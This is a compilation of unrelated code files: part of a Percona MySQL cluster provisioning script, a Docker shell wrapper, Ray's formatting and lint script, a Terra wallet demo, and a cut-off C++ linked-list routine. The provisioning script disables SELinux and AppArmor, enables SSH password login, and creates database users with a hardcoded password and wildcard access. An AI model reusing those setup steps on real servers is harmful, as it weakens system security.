    cp /etc/sysconfig/network-scripts/ifcfg-eth0 "/etc/sysconfig/network-scripts/ifcfg-${SECONDNIC}"
    sed -i "s/^DEVICE=.*/DEVICE=${SECONDNIC}/I" "/etc/sysconfig/network-scripts/ifcfg-${SECONDNIC}"
    defaultgw=$(ip route show |sed -n "s/^default via //p")
    declare -a gateway=(${defaultgw// / })
    sed -i "\$aGATEWAY=${gateway[0]}" /etc/sysconfig/network
    service network restart
  fi
}
configure_network() {
  # Open firewall ports, then apply per-distro network/security tweaks.
  open_ports
  if [ $iscentos -eq 0 ];
  then
    activate_secondnic_centos
    disable_selinux_centos
  elif [ $isubuntu -eq 0 ];
  then
    disable_apparmor_ubuntu
  fi
}
create_mycnf() {
  # Fetch the my.cnf template and substitute cluster/node specifics.
  wget "${MYCNFTEMPLATE}" -O /etc/my.cnf
  sed -i "s/^wsrep_cluster_address=.*/wsrep_cluster_address=gcomm:\/\/${CLUSTERADDRESS}/I" /etc/my.cnf
  sed -i "s/^wsrep_node_address=.*/wsrep_node_address=${NODEADDRESS}/I" /etc/my.cnf
  sed -i "s/^wsrep_node_name=.*/wsrep_node_name=${NODENAME}/I" /etc/my.cnf
  if [ $isubuntu -eq 0 ];
  then
    # Ubuntu ships the Galera provider in a different location
    sed -i "s/^wsrep_provider=.*/wsrep_provider=\/usr\/lib\/libgalera_smm.so/I" /etc/my.cnf
  fi
}
install_mysql_ubuntu() {
  # Idempotency: skip when the package is already installed.
  dpkg -s percona-xtradb-cluster-56
  if [ ${?} -eq 0 ];
  then
    return
  fi
  echo "installing mysql"
  # Add the Percona apt repo + signing key, then install non-interactively.
  apt-key adv --keyserver keys.gnupg.net --recv-keys 1C4CBDCDCD2EFD2A
  grep "repo.percona.com" /etc/apt/sources.list >/dev/null 2>&1
  if [ ${?} -ne 0 ];
  then
    echo "deb http://repo.percona.com/apt precise main" >> /etc/apt/sources.list
    echo "deb-src http://repo.percona.com/apt precise main" >> /etc/apt/sources.list
  fi
  apt-get update
  export DEBIAN_FRONTEND=noninteractive
  apt-get -q -y install percona-xtradb-cluster-56
  # xinetd hosts the mysqlchk health-check service
  apt-get -y install xinetd
}
install_mysql_centos() {
  # Idempotency: skip when the package is already installed.
  yum list installed Percona-XtraDB-Cluster-56
  if [ ${?} -eq 0 ];
  then
    return
  fi
  echo "installing mysql"
  # Add the Percona and EPEL repos, then install the cluster packages.
  yum -y install http://www.percona.com/downloads/percona-release/redhat/0.1-3/percona-release-0.1-3.noarch.rpm
  wget --no-cache https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpm
  rpm -Uvh epel-release-latest-6.noarch.rpm
  yum -y install libev
  yum -y install Percona-XtraDB-Cluster-56
  yum -y install xinetd
}
configure_mysql() {
  # Idempotency: if the mysql service already responds, assume configured.
  /etc/init.d/mysql status
  if [ ${?} -eq 0 ];
  then
    return
  fi
  create_mycnf
  # Put the datadir on the data volume, symlinked to the default path
  mkdir "${MOUNTPOINT}/mysql"
  ln -s "${MOUNTPOINT}/mysql" /var/lib/mysql
  chmod o+x /var/lib/mysql
  if [ $iscentos -eq 0 ];
  then
    install_mysql_centos
  elif [ $isubuntu -eq 0 ];
  then
    install_mysql_ubuntu
  fi
  /etc/init.d/mysql stop
  chmod o+x "${MOUNTPOINT}/mysql"
  # Register the mysqlchk health-check port (9200) for xinetd
  grep "mysqlchk" /etc/services >/dev/null 2>&1
  if [ ${?} -ne 0 ];
  then
    sed -i "\$amysqlchk 9200\/tcp #mysqlchk" /etc/services
  fi
  service xinetd restart
  # Parse the SST method and "user:password" credentials out of my.cnf
  sstmethod=$(sed -n "s/^wsrep_sst_method=//p" /etc/my.cnf)
  sst=$(sed -n "s/^wsrep_sst_auth=//p" /etc/my.cnf | cut -d'"' -f2)
  declare -a sstauth=(${sst//:/ })
  if [ $sstmethod == "mysqldump" ]; #requires root privilege for sstuser on every node
  then
    /etc/init.d/mysql bootstrap-pxc
    echo "CREATE USER '${sstauth[0]}'@'localhost' IDENTIFIED BY '${sstauth[1]}';" > /tmp/mysqldump-pxc.sql
    echo "GRANT ALL PRIVILEGES ON *.* TO '${sstauth[0]}'@'localhost' with GRANT OPTION;" >> /tmp/mysqldump-pxc.sql
    echo "CREATE USER '${sstauth[0]}'@'%' IDENTIFIED BY '${sstauth[1]}';" >> /tmp/mysqldump-pxc.sql
    echo "GRANT ALL PRIVILEGES ON *.* TO '${sstauth[0]}'@'%' with GRANT OPTION;" >> /tmp/mysqldump-pxc.sql
    echo "FLUSH PRIVILEGES;" >> /tmp/mysqldump-pxc.sql
    mysql < /tmp/mysqldump-pxc.sql
    /etc/init.d/mysql stop
  fi
  /etc/init.d/mysql $MYSQLSTARTUP
  if [ $MYSQLSTARTUP == "bootstrap-pxc" ];
  then
    if [ $sstmethod != "mysqldump" ];
    then
      echo "CREATE USER '${sstauth[0]}'@'localhost' IDENTIFIED BY '${sstauth[1]}';" > /tmp/bootstrap-pxc.sql
      echo "GRANT RELOAD, LOCK TABLES, REPLICATION CLIENT ON *.* TO '${sstauth[0]}'@'localhost';" >> /tmp/bootstrap-pxc.sql
    fi
    # NOTE(review): when sstmethod == "mysqldump" the '>>' below appends to
    # whatever /tmp/bootstrap-pxc.sql already contains from a previous run
    # (or creates it); truncation was likely intended — confirm.
    echo "CREATE USER 'clustercheckuser'@'localhost' identified by 'clustercheckpassword!';" >> /tmp/bootstrap-pxc.sql
    echo "GRANT PROCESS on *.* to 'clustercheckuser'@'localhost';" >> /tmp/bootstrap-pxc.sql
    # NOTE(review): a wildcard-host 'test' user with SELECT on *.* is a
    # security liability — confirm it is actually required.
    echo "CREATE USER 'test'@'%' identified by '${sstauth[1]}';" >> /tmp/bootstrap-pxc.sql
    echo "GRANT select on *.* to 'test'@'%';" >> /tmp/bootstrap-pxc.sql
    echo "FLUSH PRIVILEGES;" >> /tmp/bootstrap-pxc.sql
    mysql < /tmp/bootstrap-pxc.sql
  fi
}
allow_passwordssh() {
  # Ensure sshd accepts password authentication: uncomment the commented
  # default or flip an explicit "no", then reload sshd.
  grep -q '^PasswordAuthentication yes' /etc/ssh/sshd_config
  if [ ${?} -eq 0 ];
  then
    return
  fi
  sed -i "s/^#PasswordAuthentication.*/PasswordAuthentication yes/I" /etc/ssh/sshd_config
  sed -i "s/^PasswordAuthentication no.*/PasswordAuthentication yes/I" /etc/ssh/sshd_config
  /etc/init.d/sshd reload
}
# temporary workaround for CRP
allow_passwordssh
check_os
# Main: bail on unsupported distros, otherwise configure the node.
if [ $iscentos -ne 0 ] && [ $isubuntu -ne 0 ];
then
  echo "unsupported operating system"
  exit 1
else
  configure_network
  configure_disks
  configure_mysql
fi
|
#!/usr/bin/env bash
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Strict-ish shell mode: case-insensitive pattern matches, error on unset
# variables, exit on failure, inherit the ERR trap, propagate pipe failures.
shopt -s nocasematch
set -u # nounset
set -e # errexit
set -E # errtrap
set -o pipefail
#
# Gets a bash shell for a container
#
function help {
  # Print the usage banner for this wrapper script.
  printf '%s\n' \
    " " \
    "usage: ${0}" \
    " --container-name [OPTIONAL] The Docker container name. Default: bro" \
    " -h/--help Usage information." \
    " " \
    " "
}
# Default container to attach to.
CONTAINER_NAME=bro

# handle command line options
for i in "$@"; do
  case $i in
    #
    # CONTAINER_NAME
    #
    #   --container-name=<name>
    #
    --container-name=*)
      CONTAINER_NAME="${i#*=}"
      shift # past argument=value
      ;;
    #
    # -h/--help
    #
    # Fix: the original had an unreachable `shift` after `exit 0`.
    -h | --help)
      help
      exit 0
      ;;
    #
    # Unknown option
    #
    # Fix: previously the script printed the error but fell through and
    # still ran `docker exec`; abort instead.
    *)
      UNKNOWN_OPTION="${i#*=}"
      echo "Error: unknown option: $UNKNOWN_OPTION"
      help
      exit 1
      ;;
  esac
done

echo "Running bash on "
echo "CONTAINER_NAME = $CONTAINER_NAME"
echo "==================================================="
docker exec -i -t "${CONTAINER_NAME}" bash
|
#!/usr/bin/env bash
# Black + Clang formatter (if installed). This script formats all changed files from the last mergebase.
# You are encouraged to run this locally before pushing changes for review.
# Cause the script to exit if a single command fails
# Abort on command failure, unset variables, and failures inside pipelines.
set -euo pipefail
# Pinned tool versions this script is validated against; mismatches only
# produce warnings (see tool_version_check below).
FLAKE8_VERSION_REQUIRED="3.9.1"
BLACK_VERSION_REQUIRED="21.12b0"
SHELLCHECK_VERSION_REQUIRED="0.7.1"
MYPY_VERSION_REQUIRED="0.782"
# Capitalizations that must never appear in .py/.rst sources.
BANNED_WORDS="RLLib Rllib"
check_banned_words() {
  # Scan Python/reST sources for forbidden capitalizations and abort the
  # run when any is found.
  echo "Checking for common mis-spellings..."
  local word
  for word in $BANNED_WORDS; do
    if ! grep -C2 -R --include="*.py" --include="*.rst" "$word" .; then
      continue
    fi
    echo "******************************"
    echo "*** Misspelled word found! ***"
    echo "******************************"
    echo "Please fix the capitalization/spelling of \"$word\" in the above files."
    exit 1
  done
}
check_python_command_exist() {
  # Verify that the required python tool named in $1 is on PATH; exit
  # with an install hint otherwise. Only black/flake8/mypy are accepted.
  VERSION=""
  case "$1" in
    black)  VERSION=$BLACK_VERSION_REQUIRED ;;
    flake8) VERSION=$FLAKE8_VERSION_REQUIRED ;;
    mypy)   VERSION=$MYPY_VERSION_REQUIRED ;;
    *)
      echo "$1 is not a required dependency"
      exit 1
      ;;
  esac
  if ! [ -x "$(command -v "$1")" ]; then
    echo "$1 not installed. Install the python package with: pip install $1==$VERSION"
    exit 1
  fi
}
# Fail fast if any required formatter is missing; reject banned words.
check_python_command_exist black
check_python_command_exist flake8
check_python_command_exist mypy
check_banned_words
# this stops git rev-parse from failing if we run this from the .git directory
builtin cd "$(dirname "${BASH_SOURCE:-$0}")"
ROOT="$(git rev-parse --show-toplevel)"
builtin cd "$ROOT" || exit 1
# Installed tool versions, compared against the *_REQUIRED pins above.
FLAKE8_VERSION=$(flake8 --version | head -n 1 | awk '{print $1}')
BLACK_VERSION=$(black --version | awk '{print $2}')
MYPY_VERSION=$(mypy --version | awk '{print $2}')
# google-java-format is downloaded on demand to this path (see below).
GOOGLE_JAVA_FORMAT_JAR=/tmp/google-java-format-1.7-all-deps.jar
# params: tool name, tool version, required version
tool_version_check() {
  # Warn (never fail) when the installed version of tool $1 ($2) differs
  # from the pinned version ($3).
  local installed="$2" required="$3"
  if [ "$installed" = "$required" ]; then
    return 0
  fi
  echo "WARNING: Ray uses $1 $required, You currently are using $installed. This might generate different results."
}
# Warn (without failing) if installed versions differ from the pins.
tool_version_check "flake8" "$FLAKE8_VERSION" "$FLAKE8_VERSION_REQUIRED"
tool_version_check "black" "$BLACK_VERSION" "$BLACK_VERSION_REQUIRED"
tool_version_check "mypy" "$MYPY_VERSION" "$MYPY_VERSION_REQUIRED"
if command -v shellcheck >/dev/null; then
  SHELLCHECK_VERSION=$(shellcheck --version | awk '/^version:/ {print $2}')
  tool_version_check "shellcheck" "$SHELLCHECK_VERSION" "$SHELLCHECK_VERSION_REQUIRED"
else
  echo "INFO: Ray uses shellcheck for shell scripts, which is not installed. You may install shellcheck=$SHELLCHECK_VERSION_REQUIRED with your system package manager."
fi
if command -v clang-format >/dev/null; then
  CLANG_FORMAT_VERSION=$(clang-format --version | awk '{print $3}')
  tool_version_check "clang-format" "$CLANG_FORMAT_VERSION" "12.0.0"
else
  echo "WARNING: clang-format is not installed!"
fi
# google-java-format is fetched on demand rather than package-installed.
if command -v java >/dev/null; then
  if [ ! -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
    echo "Java code format tool google-java-format.jar is not installed, start to install it."
    wget https://github.com/google/google-java-format/releases/download/google-java-format-1.7/google-java-format-1.7-all-deps.jar -O "$GOOGLE_JAVA_FORMAT_JAR"
  fi
else
  echo "WARNING:java is not installed, skip format java files!"
fi
# The flake8 plugins are recommended but not mandatory; warn when absent.
if [[ $(flake8 --version) != *"flake8_quotes"* ]]; then
  echo "WARNING: Ray uses flake8 with flake8_quotes. Might error without it. Install with: pip install flake8-quotes"
fi
if [[ $(flake8 --version) != *"flake8-bugbear"* ]]; then
  echo "WARNING: Ray uses flake8 with flake8-bugbear. Might error without it. Install with: pip install flake8-bugbear"
fi
# Project-wide shellcheck exclusions used by shellcheck_scripts().
SHELLCHECK_FLAGS=(
  --exclude=1090 # "Can't follow non-constant source. Use a directive to specify location."
  --exclude=1091 # "Not following {file} due to some error"
  --exclude=2207 # "Prefer mapfile or read -a to split command output (or quote to avoid splitting)." -- these aren't compatible with macOS's old Bash
)
# TODO(dmitri): When more of the codebase is typed properly, the mypy flags
# should be set to do a more stringent check.
MYPY_FLAGS=(
  '--follow-imports=skip'
  '--ignore-missing-imports'
)
# mypy is opt-in per file for now; only these files are type-checked.
MYPY_FILES=(
  # Relative to python/ray
  'autoscaler/node_provider.py'
  'autoscaler/sdk/__init__.py'
  'autoscaler/sdk/sdk.py'
  'autoscaler/_private/commands.py'
  # TODO(dmitri) Fails with meaningless error, maybe due to a bug in the mypy version
  # in the CI. Type check once we get serious about type checking:
  #'ray_operator/operator.py'
  'ray_operator/operator_utils.py'
)
# Paths black must never reformat (vendored / generated code).
BLACK_EXCLUDES=(
  '--extend-exclude' 'python/ray/cloudpickle/*'
  '--extend-exclude' 'python/build/*'
  '--extend-exclude' 'python/ray/core/src/ray/gcs/*'
  '--extend-exclude' 'python/ray/thirdparty_files/*'
  '--extend-exclude' 'python/ray/_private/thirdparty/*'
)
# Pathspecs excluded from every `git ls-files` enumeration below.
GIT_LS_EXCLUDES=(
  ':(exclude)python/ray/cloudpickle/'
  ':(exclude)python/ray/_private/runtime_env/_clonevirtualenv.py'
)
# Java sources excluded from google-java-format (see JAVA_EXCLUDES_REGEX).
JAVA_EXCLUDES=(
  'java/api/src/main/java/io/ray/api/ActorCall.java'
  'java/api/src/main/java/io/ray/api/PyActorCall.java'
  'java/api/src/main/java/io/ray/api/RayCall.java'
)
# Build a sed-compatible alternation regex out of JAVA_EXCLUDES.
JAVA_EXCLUDES_REGEX=""
for f in "${JAVA_EXCLUDES[@]}"; do
  JAVA_EXCLUDES_REGEX="$JAVA_EXCLUDES_REGEX|(${f//\//\/})"
done
JAVA_EXCLUDES_REGEX=${JAVA_EXCLUDES_REGEX#|}
# TODO(barakmich): This should be cleaned up. I've at least excised the copies
# of these arguments to this location, but the long-term answer is to actually
# make a flake8 config file
FLAKE8_PYX_IGNORES="--ignore=C408,E121,E123,E126,E211,E225,E226,E227,E24,E704,E999,W503,W504,W605"
shellcheck_scripts() {
  # Run shellcheck with the project-wide exclusions on the given files.
  shellcheck "${SHELLCHECK_FLAGS[@]}" "$@"
}
# Runs mypy on each argument in sequence. This is different than running mypy
# once on the list of arguments.
mypy_on_each() {
  # Run mypy separately on each given file (paths relative to python/ray).
  # This is intentionally different from one mypy run over all files.
  #
  # Fix: pushd was unchecked (and its directory-stack output polluted the
  # log); fail explicitly if the directory cannot be entered.
  pushd python/ray > /dev/null || return 1
  for file in "$@"; do
    echo "Running mypy on $file"
    # Expand MYPY_FLAGS only when non-empty (safe under `set -u`).
    mypy ${MYPY_FLAGS[@]+"${MYPY_FLAGS[@]}"} "$file"
  done
  popd > /dev/null
}
# Format specified files
format_files() {
  # Dispatch each named file to the right formatter, classifying it by
  # basename, extension, or shebang line.
  local shell_files=() python_files=() bazel_files=()
  local name
  for name in "$@"; do
    local base="${name%.*}"
    local suffix="${name#${base}}"   # extension including the dot, or empty
    # First line of the file, used to sniff the interpreter when there is
    # no recognizable extension.
    local shebang=""
    read -r shebang < "${name}" || true
    case "${shebang}" in
    '#!'*)
      # Normalize "#!/usr/bin/env python" / "#!/bin/bash" down to the
      # bare interpreter name (e.g. "python", "bash").
      shebang="${shebang#/usr/bin/env }"
      shebang="${shebang%% *}"
      shebang="${shebang##*/}"
      ;;
    esac
    # NOTE(review): bazel_files are collected but not formatted in this
    # function.
    if [ "${base}" = "WORKSPACE" ] || [ "${base}" = "BUILD" ] || [ "${suffix}" = ".BUILD" ] || [ "${suffix}" = ".bazel" ] || [ "${suffix}" = ".bzl" ]; then
      bazel_files+=("${name}")
    elif [ -z "${suffix}" ] && [ "${shebang}" != "${shebang#python}" ] || [ "${suffix}" != "${suffix#.py}" ]; then
      python_files+=("${name}")
    elif [ -z "${suffix}" ] && [ "${shebang}" != "${shebang%sh}" ] || [ "${suffix}" != "${suffix#.sh}" ]; then
      shell_files+=("${name}")
    else
      echo "error: failed to determine file type: ${name}" 1>&2
      return 1
    fi
  done
  if [ 0 -lt "${#python_files[@]}" ]; then
    black "${python_files[@]}"
  fi
  # Shell files are fixed by applying shellcheck's own diff output, which
  # only new-enough shellcheck builds can produce (probed on /dev/null).
  if command -v shellcheck >/dev/null; then
    if shellcheck --shell=sh --format=diff - < /dev/null; then
      if [ 0 -lt "${#shell_files[@]}" ]; then
        local difference
        # The appended "-" sentinel keeps the command substitution from
        # stripping trailing newlines; it is removed on the next line.
        difference="$(shellcheck_scripts --format=diff "${shell_files[@]}" || true && printf "-")"
        difference="${difference%-}"
        printf "%s" "${difference}" | patch -p1
      fi
    else
      echo "error: this version of shellcheck does not support diffs"
    fi
  fi
}
format_all_scripts() {
  # Run black, mypy, flake8 (when installed) and shellcheck over every
  # tracked file in the repository.
  #
  # Fix: `command -v flake8` previously ran as a bare statement, which
  # aborts the whole script under `set -e` when flake8 is missing, and
  # the flag was then tested with `[ $HAS_FLAKE8 ]`, which is true for
  # both 0 and 1. Capture the status without tripping errexit and compare
  # numerically.
  HAS_FLAKE8=0
  command -v flake8 &> /dev/null || HAS_FLAKE8=1
  echo "$(date)" "Black...."
  git ls-files -- '*.py' "${GIT_LS_EXCLUDES[@]}" | xargs -P 10 \
    black "${BLACK_EXCLUDES[@]}"
  echo "$(date)" "MYPY...."
  mypy_on_each "${MYPY_FILES[@]}"
  if [ "$HAS_FLAKE8" -eq 0 ]; then
    echo "$(date)" "Flake8...."
    git ls-files -- '*.py' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 \
      flake8 --config=.flake8
    git ls-files -- '*.pyx' '*.pxd' '*.pxi' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 \
      flake8 --config=.flake8 "$FLAKE8_PYX_IGNORES"
  fi
  if command -v shellcheck >/dev/null; then
    local shell_files non_shell_files
    # Files without a .sh suffix may still be shell scripts if they carry
    # a sh/bash shebang; grep for those and add them to the list.
    non_shell_files=($(git ls-files -- ':(exclude)*.sh'))
    shell_files=($(git ls-files -- '*.sh'))
    if [ 0 -lt "${#non_shell_files[@]}" ]; then
      shell_files+=($(git --no-pager grep -l -- '^#!\(/usr\)\?/bin/\(env \+\)\?\(ba\)\?sh' "${non_shell_files[@]}" || true))
    fi
    if [ 0 -lt "${#shell_files[@]}" ]; then
      echo "$(date)" "shellcheck scripts...."
      shellcheck_scripts "${shell_files[@]}"
    fi
  fi
}
# Format all files, and print the diff to stdout for travis.
# Mypy is run only on files specified in the array MYPY_FILES.
format_all() {
  # Format everything: scripts (via format_all_scripts), then C++/proto
  # via clang-format, then Java via google-java-format.
  format_all_scripts "${@}"
  echo "$(date)" "clang-format...."
  if command -v clang-format >/dev/null; then
    git ls-files -- '*.cc' '*.h' '*.proto' "${GIT_LS_EXCLUDES[@]}" | xargs -P 5 clang-format -i
  fi
  echo "$(date)" "format java...."
  # Fix: the guard used a single `&`, which backgrounded `command -v java`
  # and made the condition depend only on the jar test; `&&` is the
  # intended logical AND.
  if command -v java >/dev/null && [ -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
    git ls-files -- '*.java' "${GIT_LS_EXCLUDES[@]}" | sed -E "\:$JAVA_EXCLUDES_REGEX:d" | xargs -P 5 java -jar "$GOOGLE_JAVA_FORMAT_JAR" -i
  fi
  echo "$(date)" "done!"
}
# Format files that differ from main branch. Ignores dirs that are not slated
# for autoformat yet.
format_changed() {
  # Format only the files that changed relative to upstream/master.
  #
  # The `if` guard ensures that the list of filenames is not empty, which
  # could cause the formatter to receive 0 positional arguments, making
  # Black error.
  #
  # `diff-filter=ACRM` and $MERGEBASE is to ensure we only format files that
  # exist on both branches.
  MERGEBASE="$(git merge-base upstream/master HEAD)"
  if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.py' &>/dev/null; then
    git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.py' | xargs -P 5 \
      black "${BLACK_EXCLUDES[@]}"
    if which flake8 >/dev/null; then
      git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.py' | xargs -P 5 \
        flake8 --config=.flake8
    fi
  fi
  if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.pyx' '*.pxd' '*.pxi' &>/dev/null; then
    if which flake8 >/dev/null; then
      git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.pyx' '*.pxd' '*.pxi' | xargs -P 5 \
        flake8 --config=.flake8 "$FLAKE8_PYX_IGNORES"
    fi
  fi
  if which clang-format >/dev/null; then
    if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.cc' '*.h' &>/dev/null; then
      git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.cc' '*.h' | xargs -P 5 \
        clang-format -i
    fi
  fi
  # Fix: `&` backgrounded `command -v java`, so the guard only ever tested
  # the jar's existence; `&&` is the intended logical AND.
  if command -v java >/dev/null && [ -f "$GOOGLE_JAVA_FORMAT_JAR" ]; then
    if ! git diff --diff-filter=ACRM --quiet --exit-code "$MERGEBASE" -- '*.java' &>/dev/null; then
      git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.java' | sed -E "\:$JAVA_EXCLUDES_REGEX:d" | xargs -P 5 java -jar "$GOOGLE_JAVA_FORMAT_JAR" -i
    fi
  fi
  if command -v shellcheck >/dev/null; then
    local shell_files non_shell_files
    non_shell_files=($(git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- ':(exclude)*.sh'))
    shell_files=($(git diff --name-only --diff-filter=ACRM "$MERGEBASE" -- '*.sh'))
    if [ 0 -lt "${#non_shell_files[@]}" ]; then
      shell_files+=($(git --no-pager grep -l -- '^#!\(/usr\)\?/bin/\(env \+\)\?\(ba\)\?sh' "${non_shell_files[@]}" || true))
    fi
    if [ 0 -lt "${#shell_files[@]}" ]; then
      shellcheck_scripts "${shell_files[@]}"
    fi
  fi
}
# This flag formats individual files. --files *must* be the first command line
# arg to use this option.
if [ "${1-}" == '--files' ]; then
  format_files "${@:2}"
# If `--all` or `--scripts` are passed, then any further arguments are ignored.
# Format the entire python directory and other scripts.
elif [ "${1-}" == '--all-scripts' ]; then
  format_all_scripts "${@}"
  if [ -n "${FORMAT_SH_PRINT_DIFF-}" ]; then git --no-pager diff; fi
# Format the all Python, C++, Java and other script files.
elif [ "${1-}" == '--all' ]; then
  format_all "${@}"
  if [ -n "${FORMAT_SH_PRINT_DIFF-}" ]; then git --no-pager diff; fi
else
  # Add the upstream remote if it doesn't exist
  if ! git remote -v | grep -q upstream; then
    git remote add 'upstream' 'https://github.com/ray-project/ray.git'
  fi
  # Only fetch master since that's the branch we're diffing against.
  git fetch upstream master || true
  # Format only the files that changed in last commit.
  format_changed
fi
# Ensure import ordering
# Make sure that for every import psutil; import setproctitle
# There's a import ray above it.
PYTHON_EXECUTABLE=${PYTHON_EXECUTABLE:-python}
$PYTHON_EXECUTABLE ci/lint/check_import_order.py . -s ci -s python/ray/thirdparty_files -s python/build -s lib
# Fail (exit 1) when anything above rewrote a file, so CI flags the commit.
if ! git diff --quiet &>/dev/null; then
  echo 'Reformatted changed files. Please review and stage the changes.'
  echo 'Files updated:'
  echo
  git --no-pager diff --name-only
  exit 1
fi
|
<gh_stars>1-10
import {
ConnectType,
CreateTxFailed,
NetworkInfo,
Timeout,
TxFailed,
TxResult,
TxUnspecifiedError,
UserDenied,
WalletController,
WalletStatus,
} from '@terra-money/wallet-provider';
import { combineLatest } from 'rxjs';
import { LCDClient, MsgSend, StdFee } from '@terra-money/terra.js';
// Terra network presets used by the WalletController below.
const mainnet = {
  name: 'mainnet',
  chainID: 'columbus-4',
  lcd: 'https://lcd.terra.dev',
};
const testnet = {
  name: 'testnet',
  chainID: 'tequila-0004',
  lcd: 'https://tequila-lcd.terra.dev',
};
// WalletConnect chain index -> network (0 = testnet, 1 = mainnet).
const walletConnectChainIds: Record<number, NetworkInfo> = {
  0: testnet,
  1: mainnet,
};
const controller = new WalletController({
  defaultNetwork: testnet,
  walletConnectChainIds,
});
// Recipient address for the demo send-transaction below.
const toAddress = 'terra12hnhh5vtyg5juqnzm43970nh4fw42pt27nw9g9';
// Re-render the three demo panels (#connect-sample, #query-sample,
// #tx-sample) whenever connect/install types or the wallet state change.
combineLatest([
  controller.availableConnectTypes(),
  controller.availableInstallTypes(),
  controller.states(),
]).subscribe(([availableConnectTypes, availableInstallTypes, states]) => {
  // ---------------------------------------------
  // connect
  // ---------------------------------------------
  const connectContainer = document.querySelector('#connect-sample')!;
  const connectPre = connectContainer.querySelector('section > pre')!;
  const connectFooter = connectContainer.querySelector('footer')!;
  if (connectPre) {
    connectPre.textContent = JSON.stringify(
      {
        availableConnectTypes,
        availableInstallTypes,
        states,
      },
      null,
      2,
    );
  }
  // Rebuild the action buttons from scratch on every emission.
  connectFooter.innerHTML = '';
  switch (states.status) {
    case WalletStatus.WALLET_NOT_CONNECTED:
      for (const installType of availableInstallTypes) {
        const button = document.createElement('button');
        button.textContent = `Install ${installType}`;
        button.addEventListener('click', () => {
          controller.install(installType);
        });
        connectFooter.appendChild(button);
      }
      for (const connectType of availableConnectTypes) {
        const button = document.createElement('button');
        button.textContent = `Connect ${connectType}`;
        button.addEventListener('click', () => {
          controller.connect(connectType);
        });
        connectFooter.appendChild(button);
      }
      break;
    case WalletStatus.WALLET_CONNECTED:
      const button = document.createElement('button');
      button.textContent = `Disconnect`;
      button.addEventListener('click', () => {
        controller.disconnect();
      });
      connectFooter.appendChild(button);
      break;
  }
  // ---------------------------------------------
  // query
  // ---------------------------------------------
  const queryContainer = document.querySelector('#query-sample')!;
  const queryPre = queryContainer.querySelector('section > pre')!;
  switch (states.status) {
    case WalletStatus.WALLET_NOT_CONNECTED:
      queryPre.textContent = 'Wallet not connected!';
      break;
    case WalletStatus.WALLET_CONNECTED:
      // Show the connected wallet's bank balance via the LCD endpoint.
      const lcd = new LCDClient({
        URL: states.network.lcd,
        chainID: states.network.chainID,
      });
      lcd.bank.balance(states.wallets[0].terraAddress).then((coins) => {
        queryPre.textContent = coins.toString();
      });
  }
  // ---------------------------------------------
  // tx
  // ---------------------------------------------
  const txContainer = document.querySelector('#tx-sample')!;
  const txPre = txContainer.querySelector('section > pre')!;
  const txFooter = txContainer.querySelector('footer')!;
  txFooter.innerHTML = '';
  switch (states.status) {
    case WalletStatus.WALLET_NOT_CONNECTED:
      txPre.textContent = `Wallet not connected`;
      break;
    case WalletStatus.WALLET_CONNECTED:
      // READONLY connections cannot sign, so no send button is offered.
      if (states.wallets[0].connectType === ConnectType.READONLY) {
        txPre.textContent = `Can't post Tx!`;
      } else {
        txPre.textContent = '';
        const send = () => {
          // Guard: refuse to broadcast the demo transaction on mainnet
          // (columbus-* chain IDs).
          if (states.network.chainID.startsWith('columbus')) {
            alert(`Please only execute this example on Testnet`);
            return;
          }
          controller
            .post({
              fee: new StdFee(1000000, '200000uusd'),
              msgs: [
                new MsgSend(states.wallets[0].terraAddress, toAddress, {
                  uusd: 1000000,
                }),
              ],
            })
            .then((nextTxResult: TxResult) => {
              txPre.textContent = JSON.stringify(nextTxResult, null, 2);
            })
            .catch((error: unknown) => {
              // Map each wallet-provider error class onto a short message.
              if (error instanceof UserDenied) {
                txPre.textContent = 'User Denied';
              } else if (error instanceof CreateTxFailed) {
                txPre.textContent = 'Create Tx Failed: ' + error.message;
              } else if (error instanceof TxFailed) {
                txPre.textContent = 'Tx Failed: ' + error.message;
              } else if (error instanceof Timeout) {
                txPre.textContent = 'Timeout';
              } else if (error instanceof TxUnspecifiedError) {
                txPre.textContent = 'Unspecified Error: ' + error.message;
              } else {
                txPre.textContent =
                  'Unknown Error: ' +
                  (error instanceof Error ? error.message : String(error));
              }
            });
        };
        const button = document.createElement('button');
        button.textContent = `Send 1USD to ${toAddress}`;
        button.addEventListener('click', () => {
          send();
        });
        txFooter.appendChild(button);
      }
      break;
  }
});
|
// Adds two non-negative numbers represented as linked lists of digits
// (least-significant digit first) and returns the head of a newly
// allocated result list. Returns NULL when both inputs are NULL.
Node *addTwoLists(Node* first, Node* second)
{
    Node* res = NULL; // res is head node of resultant list
    Node *temp, *prev = NULL;
    int carry = 0, sum;
    while (first != NULL || second != NULL) // while either list has digits left
    {
        // Calculate value of next digit in resultant list.
        // The next digit is sum of following things
        // (i) Carry
        // (ii) Next digit of first list (if there is a next digit)
        // (iii) Next digit of second list (if there is a next digit)
        sum = carry + (first? first->data: 0) + (second? second->data: 0);
        // update carry for next calculation
        carry = (sum >= 10)? 1 : 0;
        // keep only the ones digit
        sum = sum % 10;
        // Create a new node with sum as data
        temp = new Node(sum);
        // if this is the first node then set it as head of resultant list
        if(res == NULL)
            res = temp;
        else // If this is not the first node then connect it to the rest.
            prev->next = temp;
        // Set prev for next insertion
        prev = temp;
        // Move first and second pointers to next nodes
